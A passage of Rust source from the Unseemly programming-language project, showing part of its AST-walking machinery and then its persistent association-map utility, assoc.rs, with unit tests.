&o_renaming)), self.env.set_assoc(&fresh_o_env), ) } } thread_local! { // Tuple elements are (layers deep, number of steps taken). pub static ast_walk_layer: RefCell<(u32, u32)> = RefCell::new((0, 0)); pub static ld_enabled: bool = std::env::var("UNSEEMLY_TRACE").map(|t| t == "full") == Ok(true); } /// Make a `<Mode::D as Dir>::Out` by walking `node` in the environment from `walk_ctxt`. /// `walk_ctxt` is used as an environment, /// and by betas to access other parts of the current node. pub fn walk<Mode: WalkMode>( a: &Ast, walk_ctxt: &LazyWalkReses<Mode>, ) -> Result<<Mode::D as Dir>::Out, Mode::Err> { layer_watch! { ast_walk_layer : // TODO: can we get rid of the & in front of our arguments and save the cloning? // TODO: this has a lot of direction-specific runtime hackery. // Maybe we want separate positive and negative versions? let (a, walk_ctxt) = match a.c() { // HACK: We want to process EE before pre_match before everything else. // This probably means we should find a way to get rid of pre_match. // But we can't just swap `a` and the ctxt when `a` is LiteralLike and the ctxt isn't. ExtendEnv(_,_) => { (a.clone(), walk_ctxt.clone()) } _ => Mode::D::pre_walk(a.clone(), walk_ctxt.clone()) }; ld!(ast_walk_layer, ld_enabled, "{} {}", Mode::name(), a); // lc!(ast_walk_layer, ld_enabled, " from: {}", walk_ctxt.this_ast); // match walk_ctxt.env.find(&negative_ret_val()) { // Some(ref ctxt) => lc!(ast_walk_layer, ld_enabled, " ctxt: {}", ctxt), _ => {}}; // lc!(ast_walk_layer, ld_enabled, " in: {}", walk_ctxt.env/*.map_borrow_f(&mut |_| "…")*/); let literally : Option<bool> = // If we're under a wrapper, `this_ast` might not be a Node match a.c() { QuoteMore(_,_) | QuoteLess(_,_) | ExtendEnv(_,_) | ExtendEnvPhaseless(_,_) => { match walk_ctxt.this_ast.c() { // `this_ast` might be `NotWalked` (and non-literal) if under `switch_mode`. // It's weird, but seems to be the right thing Node(f, _, _) => Some(Mode::get_walk_rule(f).is_literally()), _ => None } } _ => None }; match a.c() { Node(f, parts, _) => { let mut new_walk_ctxt = walk_ctxt.switch_ast(parts, a.clone()); heal__lwr_splices(&mut new_walk_ctxt)?; // certain walks only work on certain kinds of AST nodes match Mode::get_walk_rule(f) { Custom(ref ts_fn) => ts_fn(new_walk_ctxt), Body(n) => walk(parts.get_leaf(n).unwrap(), &new_walk_ctxt), LiteralLike => Mode::walk_quasi_literally(a.clone(), &new_walk_ctxt), NotWalked => icp!("{:#?} should not be walked at all!", a) } } IncompleteNode(parts) => { icp!("{:#?} isn't a complete node", parts)} VariableReference(n) => { Mode::walk_var(*n, &walk_ctxt) } Atom(n) => { Mode::walk_atom(*n, &walk_ctxt) } // TODO: we need to preserve these in LiteralLike contexts!! // So do we just set the context element at the wrong level and then grab it for the shift? // I guess so. QuoteMore(body, pos_inside) => { let oeh_m = Mode::D::oeh_if_negative(); let old_ctxt_elt = walk_ctxt.maybe__context_elt(); let currently_positive = oeh_m.is_none(); // kinda a hack for "Is `Mode` positive?" // Negative modes at quotation does some weird stuff. For example: // `match e { `[Expr | (add 5 ,[Expr<Nat> | a],)]` => ⋯}` // ^--- `quote_more` here (`get_res` produces `Expr<Nat>`), // which we already knew. // ^--- `quote_less`, and we get {a => Expr<Nat>} // We need to smuggle out what we know at each `quote_less` (there might be many), // so that `a` winds up bound to `Expr<Nat>` on the RHS. // If the quotation (outside) is negative, we need to unsquirrel no matter the inside. // If both are positive, return the result (so the form can do `Nat` → `Expr<Nat>`). // Otherwise, the context (expected type) is the result. if pos_inside == &currently_positive { // stay in the same mode? let inner_walk_ctxt = walk_ctxt.quote_more(oeh_m.clone()); let res = maybe_literally__walk(&a, body, inner_walk_ctxt, old_ctxt_elt, literally)?; match oeh_m { None => Ok(res), // positive walk, result is useful. Otherwise, unsquirrel: Some(oeh) => { Ok( Mode::env_as_out((*oeh.borrow()).clone()) ) } } } else { let inner_walk_ctxt = walk_ctxt .switch_mode::<Mode::Negated>().quote_more(oeh_m.clone()); let _ = maybe_literally__walk(&a, body, inner_walk_ctxt, old_ctxt_elt, literally)?; match oeh_m { // HACK: just return the context element (and massage the type) None => Mode::walk_var(negative_ret_val(), &walk_ctxt), Some(oeh) => { Ok( Mode::env_as_out((*oeh.borrow()).clone()) ) } } } } QuoteLess(body, depth) => { let old_ctxt_elt = walk_ctxt.maybe__context_elt(); let mut oeh = None; let mut walk_ctxt = walk_ctxt; for _ in 0..*depth { let (oeh_new, walk_ctxt_new) = walk_ctxt.quote_less(); oeh = oeh_new; walk_ctxt = walk_ctxt_new; } let res = maybe_literally__walk(&a, body, walk_ctxt, old_ctxt_elt, literally)?; squirrel_away::<Mode>(oeh, res.clone()); Ok(res) } Trivial | Shape(_) => { icp!("{:#?} is not a walkable AST in {}", a, Mode::name()); } ExtendEnv(ref body, ref beta) | ExtendEnvPhaseless(ref body, ref beta) => { let phaseless = matches!(a.c(), ExtendEnvPhaseless(_,_)); fn extract__ee_body<Mode: WalkMode>(e: <Mode as WalkMode>::Elt) -> <Mode as WalkMode>::Elt { match e.to_ast().c() { ExtendEnv(ref body, _) | ExtendEnvPhaseless(ref body, _) => { <Mode as WalkMode>::Elt::from_ast(body) } _ => { e } // Match will fail } } let new__walk_ctxt = if !Mode::automatically_extend_env() { walk_ctxt.clone() } else if phaseless { let extension = &env_from_beta(beta, &walk_ctxt)?; LazyWalkReses { env: walk_ctxt.env.set_assoc(extension), prelude_env: walk_ctxt.prelude_env.set_assoc(extension), more_quoted_env: walk_ctxt.more_quoted_env.iter().map( |e| e.set_assoc(extension)).collect(), less_quoted_env: walk_ctxt.less_quoted_env.iter().map( |e| e.set_assoc(extension)).collect(), .. walk_ctxt.clone() } } else { walk_ctxt.with_environment(walk_ctxt.env.set_assoc(&env_from_beta(beta, &walk_ctxt)?)) }; let new__walk_ctxt = // If the RHS is also binding, assume it's the same // TODO: we should make this only happen if we're actually negative. // The context element is sometimes leftover from a previous negative walk. new__walk_ctxt.with_context(extract__ee_body::<Mode>( walk_ctxt.env.find(&negative_ret_val()).unwrap_or( &<Mode as WalkMode>::Elt::from_ast(&ast!((trivial)))).clone())); maybe_literally__walk(&a, body, new__walk_ctxt, walk_ctxt.maybe__context_elt().map(extract__ee_body::<Mode>), literally) } } } } // This fixes up `walk_ctxt` based on splice healing. // TODO #40: Its effects on the rest of the code are too complex: // * `extra_env` needs to be used in various places, but exactly where is fuzzy // * `walk_ctxt` goes out of sync with its `Ast`; // Negative::walk_quasi_literally was using the Ast but had to switch to using the `walk_ctxt` fn heal__lwr_splices<Mode: WalkMode>(walk_ctxt: &mut LazyWalkReses<Mode>) -> Result<(), Mode::Err> { if !Mode::needs__splice_healing() { return Ok(()); // only do this once, at the top level } let orig_walk_ctxt = walk_ctxt.clone(); if Mode::D::is_positive() { walk_ctxt.parts.heal_splices::<Mode::Err>(&|lwt: &Rc<LazilyWalkedTerm<Mode>>| { if let Node(sub_f, sub_parts, _) = lwt.term.c() { if let Some((envs, new_term)) = Mode::perform_splice_positive( sub_f, &orig_walk_ctxt.clone().switch_ast(sub_parts, lwt.term.clone()), )? { Ok(Some( envs.into_iter() .map(|env| { Rc::new(LazilyWalkedTerm { term: new_term.clone(), res: lwt.res.clone(), extra_env: env, }) }) .collect::<Vec<_>>(), )) } else { Ok(None) } } else { Ok(None) } })?; } else { let its_a_trivial_ast = EnvMBE::new(); let context_ast = walk_ctxt.context_elt().to_ast(); let other_parts = match (&context_ast.c(), &walk_ctxt.this_ast.c()) { (&Node(ref f, ref p, _), &Node(ref f_this, _, _)) => { if f != f_this { // Mismatched ASTs; some subtyping rules allow this, but healing is nonsensical return Ok(()); } p } _ => &its_a_trivial_ast, }; // Note that this is asymmetric: // the walked Ast conforms itself to fit the context element. // In practice, that seems to be what subtyping wants. // Is this a coincidence? walk_ctxt.parts.heal_splices__with::<Mode::Err, Ast>( other_parts, &|lwt: &Rc<LazilyWalkedTerm<Mode>>, sub_other_thunk: &dyn Fn() -> Vec<Ast>| { if let Node(ref sub_f, ref sub_parts, _) = lwt.term.c() { // TODO: negative if let Some((envs, new_term)) = Mode::perform_splice_negative( sub_f, &orig_walk_ctxt.clone().switch_ast(sub_parts, lwt.term.clone()), sub_other_thunk, )? { Ok(Some( envs.into_iter() .map(|env| { Rc::new(LazilyWalkedTerm { term: new_term.clone(), res: lwt.res.clone(), extra_env: env, }) }) .collect::<Vec<_>>(), )) } else { Ok(None) } } else { Ok(None) } }, )?; } Ok(()) } /// If a `Node` is `LiteralLike`, its imports and [un]quotes should be, too! fn maybe_literally__walk<Mode: WalkMode>( a: &Ast, body: &Ast, walk_ctxt: LazyWalkReses<Mode>, ctxt_elt: Option<Mode::Elt>, literally: Option<bool>, ) -> Result<<Mode::D as Dir>::Out, Mode::Err> { let walk_ctxt = match ctxt_elt { Some(e) => walk_ctxt.with_context(e), None => walk_ctxt, }; // It might be right to assume that it's true if the mode is quasiquotation if literally.expect("ICP: unable to determine literalness") { Mode::walk_quasi_literally(a.clone(), &walk_ctxt) } else { walk(&*body, &walk_ctxt) } } /// How do we walk a particular node? This is a super-abstract question, hence all the `<>`s. #[derive(Clone)] pub enum WalkRule<Mode: WalkMode> { /// A function from the types/values of the *parts* of this form /// to the type/value of this form. /// The environment is accessible via the `LazyWalkReses`. /// Any of the other `WalkRule`s can be implemented as a simple `Custom`. Custom(Rc<Box<(dyn Fn(LazyWalkReses<Mode>) -> Result<<Mode::D as Dir>::Out, Mode::Err>)>>), /// "this form has the same type/value as one of its subforms". /// (useful for forms that only exist as wrapper s around other AST nodes) Body(Name), /// "traverse the subterms, and rebuild this syntax around them". /// Only valid in modes where `Ast`s can be converted to `::Elt`s. LiteralLike, /// "this form should not ever be walked". NotWalked, } impl<Mode: WalkMode> WalkRule<Mode> { fn is_literally(&self) -> bool { matches!(self, LiteralLike) } } // trait bounds on parameters and functions are not yet supported by `Reifiable!` impl<Mode: WalkMode + Copy + 'static> reify::Reifiable for WalkRule<Mode> { // Maybe there's some magic we can do somewhere to make this opaque? fn ty_name() -> Name { n("WalkRule") } fn concrete_arguments() -> Option<Vec<Ast>> { Some(vec![Mode::ty_invocation()]) } fn reify(&self) -> eval::Value { match *self { NotWalked => val!(enum "NotWalked",), Body(ref n) => val!(enum "Body", (, n.reify())), Custom(ref lwr_to_out) => val!(enum "Custom", (, reify::reify_1ary_function(lwr_to_out.clone()))), LiteralLike => val!(enum "LiteralLike",), } } fn reflect(v: &eval::Value) -> Self { extract!((v) eval::Value::Enum = (ref choice, ref parts) => if choice.is("NotWalked") { WalkRule::NotWalked } else if choice.is("Body") { WalkRule::Body(Name::reflect(&parts[0])) } else if choice.is("Custom") { WalkRule::Custom(reify::reflect_1ary_function(parts[0].clone())) } else if choice.is("LiteralLike") { WalkRule::LiteralLike } else { icp!() }) } } impl<Mode: WalkMode> std::fmt::Debug for WalkRule<Mode> { fn fmt(&self, f: &mut std::fmt::Formatter) -> std::fmt::Result { match *self { NotWalked => write!(f, "NotWalked"), Body(ref n) => write!(f, "Body({})", n), Custom(_) => write!(f, "Custom(-)"), LiteralLike => write!(f, "LiteralLike"), } } } pub use self::WalkRule::*; /// An environment of walked things. pub type ResEnv<Elt> = Assoc<Name, Elt>; /// A term where the results of walking subterms is memoized. #[derive(Debug)] pub struct LazilyWalkedTerm<Mode: WalkMode> { pub term: Ast, pub res: RefCell<Option<Result<<Mode::D as Dir>::Out, Mode::Err>>>, /// This is a hack; it's specifically for the dotdotdot type. /// Maybe it needs generalization in some direction. pub extra_env: Assoc<Name, Mode::Elt>, } // trait bounds on parameters are not yet supported by `Reifiable!` impl<Mode: WalkMode> reify::Reifiable for LazilyWalkedTerm<Mode> { fn ty_name() -> Name { n("LazilyWalkedTerm") } fn concrete_arguments() -> Option<Vec<Ast>> { Some(vec![Mode::ty_invocation()]) } fn reify(&self) -> eval::Value { val!(struct "term" => (, self.term.reify()), "res" => (, self.res.reify()), "extra_env" => (, self.extra_env.reify())) } fn reflect(v: &eval::Value) -> Self { extract!((v) eval::Value::Struct = (ref contents) => LazilyWalkedTerm { term: Ast::reflect(contents.find_or_panic(&n("term"))), res: RefCell::<Option<Result<<Mode::D as Dir>::Out, Mode::Err>>>::reflect( contents.find_or_panic(&n("res"))), extra_env: Assoc::<Name, Mode::Elt>::reflect(contents.find_or_panic(&n("extra_env"))) }) } } // We only implement this because lazy-rust is unstable impl<Mode: WalkMode> LazilyWalkedTerm<Mode> { pub fn new(t: &Ast) -> Rc<LazilyWalkedTerm<Mode>> { Rc::new(LazilyWalkedTerm { term: t.clone(), res: RefCell::new(None), extra_env: Assoc::new(), }) } /// Get the result of walking this term (memoized) fn get_res( &self, cur_node_contents: &LazyWalkReses<Mode>, ) -> Result<<Mode::D as Dir>::Out, Mode::Err> { self.memoized(&|| { // stab-in-the-dark optimization, but this function gets called a *lot*: if self.extra_env.empty() { walk::<Mode>(&self.term, cur_node_contents) } else { walk::<Mode>( &self.term, &cur_node_contents .with_environment(cur_node_contents.env.set_assoc(&self.extra_env)), ) } }) } fn memoized( &self, f: &dyn Fn() -> Result<<Mode::D as Dir>::Out, Mode::Err>, ) -> Result<<Mode::D as Dir>::Out, Mode::Err> { let result = self.res.borrow_mut().take().unwrap_or_else(f); *self.res.borrow_mut() = Some(result.clone()); result } fn clear_memo(&self) { *self.res.borrow_mut() = None; } } pub type OutEnvHandle<Mode> = Rc<RefCell<Assoc<Name, <Mode as WalkMode>::Elt>>>; /// Only does anything if `Mode` is negative. pub fn squirrel_away<Mode: WalkMode>( opt_oeh: Option<OutEnvHandle<Mode>>, more_env: <Mode::D as Dir>::Out, ) { if let Some(oeh) = opt_oeh { let new_env = oeh.borrow().set_assoc(&Mode::out_as_env(more_env)); *oeh.borrow_mut() = new_env; } } /// Package containing enough information to walk the subforms of some form on-demand. /// /// It is safe to have unwalkable subforms, as long as nothing ever refers to them. /// /// Contents probably shouldn't be `pub`... #[derive(Debug, Clone)] pub struct LazyWalkReses<Mode: WalkMode> { /// Things that we have walked and that we might walk pub parts: EnvMBE<Rc<LazilyWalkedTerm<Mode>>>, /// The environment of the overall walk. pub env: ResEnv<Mode::Elt>, /// The environment to use when entering a new phase. /// It's like a prelude, except that it's affected by syntax extensions. pub prelude_env: ResEnv<Mode::Elt>, /// The environment for syntax quotation (deeper on the front, shallower on the back) pub more_quoted_env: Vec<ResEnv<Mode::Elt>>, /// The environment for interpolation (further out on the front, nearer on the back) pub less_quoted_env: Vec<ResEnv<Mode::Elt>>, /// For all the less-quoted walks ongoing whose direction is negative, /// we need to smuggle out results. /// This is a stack of (optional, because not all walks are negative) mutable handles /// to the environments being accumulated. pub less_quoted_out_env: Vec<Option<OutEnvHandle<Mode>>>, pub this_ast: Ast, pub extra_info: Mode::ExtraInfo, } // trait bounds on parameters are not yet supported by `Reifiable!` impl<Mode: WalkMode> reify::Reifiable for LazyWalkReses<Mode> { fn ty_name() -> Name { n("LazyWalkedReses") } fn concrete_arguments() -> Option<Vec<Ast>> { Some(vec![Mode::ty_invocation()]) } fn reify(&self) -> eval::Value { val!(struct "parts" => (, self.parts.reify()), "env" => (, self.env.reify()), "prelude_env" => (,self.prelude_env.reify()), "more_quoted_env" => (,self.more_quoted_env.reify()), "less_quoted_env" => (,self.less_quoted_env.reify()), "less_quoted_out_env" => (,self.less_quoted_out_env.reify()), "this_ast" => (, self.this_ast.reify()), "extra_info" => (, self.extra_info.reify())) } fn reflect(v: &eval::Value) -> Self { extract!((v) eval::Value::Struct = (ref contents) => LazyWalkReses { parts: EnvMBE::<Rc<LazilyWalkedTerm<Mode>>>::reflect( contents.find_or_panic(&n("parts"))), env: ResEnv::<Mode::Elt>::reflect( contents.find_or_panic(&n("env"))), prelude_env: ResEnv::<Mode::Elt>::reflect( contents.find_or_panic(&n("prelude_env"))), more_quoted_env: Vec::<ResEnv<Mode::Elt>>::reflect( contents.find_or_panic(&n("more_quoted_env"))), less_quoted_env: Vec::<ResEnv<Mode::Elt>>::reflect( contents.find_or_panic(&n("less_quoted_env"))), less_quoted_out_env: Vec::<Option<Rc<RefCell<Assoc<Name,Mode::Elt>>>>>::reflect( contents.find_or_panic(&n("less_quoted_out_env"))), this_ast: Ast::reflect( contents.find_or_panic(&n("this_ast"))), extra_info: Mode::ExtraInfo::reflect( contents.find_or_panic(&n("extra_info")))}) } } impl<Mode: WalkMode> LazyWalkReses<Mode> { pub fn new( env: ResEnv<Mode::Elt>, prelude_env: ResEnv<Mode::Elt>, this_ast: Ast, ) -> LazyWalkReses<Mode> { LazyWalkReses { env: env, prelude_env: prelude_env, more_quoted_env: vec![], less_quoted_env: vec![], less_quoted_out_env: vec![], parts: match this_ast.maybe_node_parts() { Some(parts_unwalked) => parts_unwalked.map(&mut LazilyWalkedTerm::new), None => EnvMBE::new(), }, this_ast: this_ast, extra_info: std::default::Default::default(), } } /// Slight hack: this is just to get a recursion started with some environment. /// Only use this in tests or at the top level; this discards any non-phase-0-environments! /// TODO: this is actually used a bunch of places; maybe we should be passing LWR instead. /// Maybe LWR should be renamed. pub fn new_wrapper(env: ResEnv<Mode::Elt>) -> LazyWalkReses<Mode> { LazyWalkReses { env: env.clone(), prelude_env: env, more_quoted_env: vec![], less_quoted_env: vec![], less_quoted_out_env: vec![], parts: EnvMBE::new(), // TODO #46: This sets us up with a "default" value for `literally`. this_ast: ast!({ crate::form::simple_form("wrapper", crate::grammar::FormPat::Impossible); }), extra_info: std::default::Default::default(), } } pub fn new_mq_wrapper( env: ResEnv<Mode::Elt>, mqe: Vec<ResEnv<Mode::Elt>>, ) -> LazyWalkReses<Mode> { LazyWalkReses { env: env, prelude_env: Assoc::new(), more_quoted_env: mqe, less_quoted_env: vec![], less_quoted_out_env: vec![], // If we want a `lqe`, we need to fill this in, too! parts: EnvMBE::new(), // TODO #46: This sets us up with a "default" value for `literally`. this_ast: ast!({ crate::form::simple_form("wrapper", crate::grammar::FormPat::Impossible); }), extra_info: std::default::Default::default(), } } pub fn new_empty() -> LazyWalkReses<Mode> { Self::new_wrapper(Assoc::new()) } pub fn switch_ast(self, parts: &EnvMBE<Ast>, this_ast: Ast) -> LazyWalkReses<Mode> { LazyWalkReses { parts: parts.map(&mut LazilyWalkedTerm::new), this_ast: this_ast, ..self } } pub fn this_form(&self) -> Rc<crate::form::Form> { match self.this_ast.c() { Node(ref f, _, _) => f.clone(), _ => icp!(), } } /// The result of walking the subform named `part_name`. This is memoized. pub fn get_res(&self, part_name: Name) -> Result<<Mode::D as Dir>::Out, Mode::Err> { self.parts.get_leaf_or_panic(&part_name).get_res(self) } /// Will `get_res` or `get_term` panic? /// Rarely used, because a form typically knows which named subterms it has based on parsing. pub fn has(&self, part_name: Name) -> bool { self.parts.get_leaf(part_name).is_some() } /// Like `get_res`, but for subforms that are repeated at depth 1. Sort of a hack. pub fn get_rep_res(&self, part_name: Name) -> Result<Vec<<Mode::D as Dir>::Out>, Mode::Err> { self.parts.get_rep_leaf_or_panic(part_name).iter().map(|&lwt| lwt.get_res(self)).collect() } /// Like `get_res`, but with `depth` levels of repetition, and calling `f` to flatten the result pub fn flatten_res_at_depth( &self, part_name: Name, depth: u8, map: &dyn Fn(<Mode::D as Dir>::Out) -> <Mode::D as Dir>::Out, flatten: &dyn Fn(Vec<<Mode::D as Dir>::Out>) -> <Mode::D as Dir>::Out, ) -> Result<<Mode::D as Dir>::Out, Mode::Err> { self.parts.map_flatten_rep_leaf_or_panic( part_name, depth, &|lwt: &Rc<LazilyWalkedTerm<Mode>>| -> Result<<Mode::D as Dir>::Out, Mode::Err> { lwt.get_res(self).map(map) }, &|v: Vec<Result<<Mode::D as Dir>::Out, Mode::Err>>| { let mut accum = vec![]; for elt in v { accum.push(elt?); } Ok(flatten(accum)) }, ) } /// Like `flatten_res_at_depth`, but uses `leaf` instead of doing `get_res` /// TODO: this is used in only one place, and feels really awkward. pub fn flatten_generate_at_depth( &self, part_name: Name, depth: u8, generate: &dyn Fn() -> <Mode::D as Dir>::Out, flatten: &dyn Fn(Vec<<Mode::D as Dir>::Out>) -> <Mode::D as Dir>::Out, ) -> <Mode::D as Dir>::Out { self.parts.map_flatten_rep_leaf_or_panic( part_name, depth, &|_| -> <Mode::D as Dir>::Out { generate() }, &&|v: Vec<<Mode::D as Dir>::Out>| { let mut accum = vec![]; for elt in v { accum.push(elt); } flatten(accum) }, ) } /// Like `get_term`, but with `depth` levels of repetition, and calling `m` to map and `f` to /// flatten the result pub fn map_flatten_term_at_depth<S>( &self, part_name: Name, depth: u8, m: &dyn Fn(&Ast) -> S, f: &dyn Fn(Vec<S>) -> S, ) -> S { self.parts.map_flatten_rep_leaf_or_panic( part_name, depth, &|lwt: &Rc<LazilyWalkedTerm<Mode>>| -> S { return m(&lwt.term) }, f, ) } // /** Like `get_rep_res`, but doesn't panic if the name is absent. */ // pub fn maybe_get_rep_res(&self, part_name: &Name) -> Option<Result<Vec<<Mode::D as Dir>::Out>, Mode::Err>> { // self.parts.get_rep_leaf(part_name).map(|parts| // parts.iter().map( |&lwt| lwt.get_res(self)).collect()) // } /// The subform named `part_name`, without any processing. pub fn get_term(&self, part_name: Name) -> Ast {
rust
MIT
dd1f55be7b09b741a25af954c7a902eeac00a0c2
2026-01-04T20:20:52.848824Z
true
paulstansifer/unseemly
https://github.com/paulstansifer/unseemly/blob/dd1f55be7b09b741a25af954c7a902eeac00a0c2/src/util/assoc.rs
src/util/assoc.rs
use crate::runtime::reify::Reifiable; use std::{clone::Clone, fmt, hash::Hash, rc::Rc}; extern crate im_rc; use self::im_rc::HashMap; thread_local! { static next_id: std::cell::RefCell<u32> = std::cell::RefCell::new(0); } fn get_next_id() -> u32 { next_id.with(|id| { let res = *id.borrow(); *id.borrow_mut() += 1; res }) } /// A persistent key-value store. `clone`, `set`, and `find` are sub-linear. #[derive(Clone)] pub struct Assoc<K, V> where K: Eq + Hash + Clone { hamt: HashMap<K, V>, // TODO: this is a hack, needed for `almost_ptr_eq`, // which in turn is only needed in `earley.rs`. // `earley.rs` should use interning as a replacement optimization, and `id` should be removed. id: u32, } impl<K: Eq + Hash + Clone, V: Clone + PartialEq> PartialEq for Assoc<K, V> { // `id` is not relevant for equality fn eq(&self, other: &Self) -> bool { self.hamt == other.hamt } } impl<K: Eq + Hash + Clone, V: Clone + Eq> Eq for Assoc<K, V> {} impl<K: Eq + Hash + Clone, V: Clone> Default for Assoc<K, V> { fn default() -> Self { Self::new() } } impl<K: Eq + Hash + Clone + Reifiable, V: Clone + Reifiable> Reifiable for Assoc<K, V> { fn ty_name() -> crate::name::Name { crate::name::n("Assoc") } fn concrete_arguments() -> Option<Vec<crate::ast::Ast>> { Some(vec![K::ty_invocation(), V::ty_invocation()]) } fn reify(&self) -> crate::runtime::eval::Value { let res: Vec<_> = self.hamt.iter().map(|(k, v)| Rc::new((k.clone(), v.clone()).reify())).collect(); crate::runtime::eval::Value::Sequence(res) } fn reflect(v: &crate::runtime::eval::Value) -> Self { let mut res = Assoc::<K, V>::new(); extract!((v) crate::runtime::eval::Value::Sequence = (ref parts) => { for part in parts { let (k_part, v_part) = <(K,V)>::reflect(&**part); res = res.set(k_part, v_part); } }); res } } impl<K: Eq + Hash + Clone + fmt::Debug, V: Clone + fmt::Debug> fmt::Debug for Assoc<K, V> { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { write!(f, "⟦")?; let mut first = true; for (k, v) in self.iter_pairs() { if !first { write!(f, ", ")?; } write!(f, "{:#?} ⇒ {:#?}", k, v)?; first = false; } write!(f, "⟧") } } impl<K: Eq + Hash + Clone + fmt::Display, V: Clone + fmt::Display> fmt::Display for Assoc<K, V> { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { write!(f, "⟦")?; let mut first = true; for (k, v) in self.iter_pairs() { if !first { write!(f, ", ")?; } write!(f, "{} ⇒ {}", k, v)?; first = false; } write!(f, "⟧") } } // Maybe we should admit that `K` is always `Name` (=`usize`) and stop taking references to it? // Maybe we shouldn't even parameterize over it? impl<K: Eq + Hash + Clone, V: Clone> Assoc<K, V> { fn from_hamt(hamt: HashMap<K, V>) -> Self { Assoc { hamt: hamt, id: get_next_id() } } pub fn new() -> Self { Self::from_hamt(HashMap::new()) } pub fn find(&self, key: &K) -> Option<&V> { self.hamt.get(key) } pub fn set(&self, key: K, value: V) -> Self { Self::from_hamt(self.hamt.update(key, value)) } pub fn set_assoc(&self, other: &Self) -> Self { Self::from_hamt(other.hamt.clone().union(self.hamt.clone())) } pub fn union_with<F>(&self, other: &Self, f: F) -> Self where F: FnMut(V, V) -> V { Self::from_hamt(self.hamt.clone().union_with(other.hamt.clone(), f)) } pub fn mut_set(&mut self, key: K, value: V) { self.hamt.insert(key, value); } pub fn single(key: K, value: V) -> Self { Self::new().set(key, value) } pub fn empty(&self) -> bool { self.hamt.is_empty() } pub fn iter_pairs(&self) -> im_rc::hashmap::Iter<K, V> { self.hamt.iter() } pub fn iter_keys(&self) -> im_rc::hashmap::Keys<K, V> { self.hamt.keys() } pub fn iter_values(&self) -> im_rc::hashmap::Values<K, V> { self.hamt.values() } pub fn map<NewV: Clone, F>(&self, mut f: F) -> Assoc<K, NewV> where F: FnMut(&V) -> NewV { self.map_borrow_f(&mut f) } pub fn map_borrow_f<'assoc, NewV: Clone, F>(&'assoc self, f: &mut F) -> Assoc<K, NewV> where F: FnMut(&'assoc V) -> NewV { Assoc::<K, NewV>::from_hamt(self.hamt.iter().map(|(k, ref v)| (k.clone(), f(v))).collect()) } pub fn keyed_map_borrow_f<NewV: Clone, F>(&self, f: &mut F) -> Assoc<K, NewV> where F: FnMut(&K, &V) -> NewV { Assoc::<K, NewV>::from_hamt( self.hamt.iter().map(|(k, ref v)| (k.clone(), f(k, v))).collect(), ) } pub fn map_with<OtherV: Clone, NewV: Clone>( &self, other: &Assoc<K, OtherV>, f: &dyn Fn(&V, &OtherV) -> NewV, ) -> Assoc<K, NewV> { Assoc::<K, NewV>::from_hamt( self.hamt .clone() .intersection_with_key(other.hamt.clone(), |_, ref v_l, ref v_r| f(v_l, v_r)), ) } pub fn keyed_map_with<OtherV: Clone, NewV: Clone>( &self, other: &Assoc<K, OtherV>, f: &dyn Fn(&K, &V, &OtherV) -> NewV, ) -> Assoc<K, NewV> { Assoc::<K, NewV>::from_hamt( self.hamt .clone() .intersection_with_key(other.hamt.clone(), |ref k, ref v_l, ref v_r| { f(k, v_l, v_r) }), ) } pub fn find_value<'assoc, 'f>(&'assoc self, target: &'f V) -> Option<&'assoc K> where V: PartialEq { self.hamt.iter().find(|(_, v)| v == &target).map(|(k, _)| k) } pub fn find_or_panic<'assoc, 'f>(&'assoc self, target: &'f K) -> &'assoc V where K: fmt::Display { self.find(target).unwrap_or_else(|| icp!("'{}' not found in {}", target, self.map(|_| "…"))) } pub fn remove<'assoc, 'f>(&'assoc mut self, target: &'f K) -> Option<V> { self.hamt.remove(target) } pub fn remove_or_panic<'assoc, 'f>(&'assoc mut self, target: &'f K) -> V where K: fmt::Display { self.hamt .remove(target) .unwrap_or_else(|| icp!("{} not found in {}", target, self.map(|_| "…"))) } // Generates a version of `self` that lacks the entries that have identical values in `other` pub fn cut_common(&self, other: &Assoc<K, V>) -> Assoc<K, V> where V: PartialEq { let mut hamt = self.hamt.clone(); hamt.retain(|k, v| other.find(k) != Some(v)); Self::from_hamt(hamt) } pub fn unset(&self, k: &K) -> Assoc<K, V> { Self::from_hamt(self.hamt.without(k)) } pub fn reduce<Out>(&self, red: &dyn Fn(&K, &V, Out) -> Out, base: Out) -> Out { self.hamt.iter().fold(base, |base, (k, v)| red(k, v, base)) } } impl<K: Eq + Hash + Clone, V: Clone> Assoc<K, V> { pub fn almost_ptr_eq(&self, other: &Assoc<K, V>) -> bool { self.id == other.id // Only true if they are clones of each other } } impl<K: Eq + Hash + Clone, V: Clone, E: Clone> Assoc<K, Result<V, E>> { pub fn lift_result(self) -> Result<Assoc<K, V>, E> { let mut oks = vec![]; for (k, res_v) in self.hamt.into_iter() { oks.push((k, res_v?)) } Ok(Assoc::<K, V>::from_hamt(HashMap::from(oks))) } } #[test] fn basic_assoc() { let mt: Assoc<i32, i32> = Assoc::new(); let a1 = mt.set(5, 6); let a2 = a1.set(6, 7); let a_override = a2.set(5, 500); assert_eq!(mt.find(&5), None); assert_eq!(a1.find(&6), None); assert_eq!(a2.find(&999), None); assert_eq!(a_override.find(&999), None); assert_eq!(a1.find(&5), Some(&6)); assert_eq!(a2.find(&5), Some(&6)); assert_eq!(a2.find(&6), Some(&7)); assert_eq!(a2.find(&5), Some(&6)); assert_eq!(a_override.find(&5), Some(&500)); assert_eq!(a_override.find(&6), Some(&7)); assert_eq!(a_override.unset(&5).find(&5), None); assert_eq!(a_override.unset(&6).find(&6), None); assert_eq!(a_override.unset(&6).find(&5), Some(&500)); assert_eq!(a_override.unset(&5).find(&6), Some(&7)); assert_eq!(a_override.unset(&-111).find(&5), Some(&500)); } #[test] fn assoc_equality() { let mt: Assoc<i32, i32> = Assoc::new(); let a1 = mt.set(5, 6); let a2 = a1.set(6, 7); let a_override = a2.set(5, 500); let a2_opposite = mt.set(6, 7).set(5, 6); let a_override_direct = mt.set(5, 500).set(6, 7); assert_eq!(mt, Assoc::new()); assert_eq!(a1, a1); assert!(a1 != mt); assert!(mt != a1); assert_eq!(a2, a2); assert_eq!(a2, a2_opposite); assert_eq!(a_override, a_override_direct); assert!(a2 != a_override); let a1_again = mt.set(5, 6); // Nothing shared: no-op assert_eq!(mt.cut_common(&mt), mt); assert_eq!(a1.cut_common(&mt), a1); assert_eq!(mt.cut_common(&a1), mt); // Everything shared: empty result assert_eq!(a1_again.cut_common(&a1), mt); assert_eq!(a_override_direct.cut_common(&a_override), mt); assert_eq!(a_override.cut_common(&a_override_direct), mt); assert_eq!(a1.cut_common(&a1), mt); 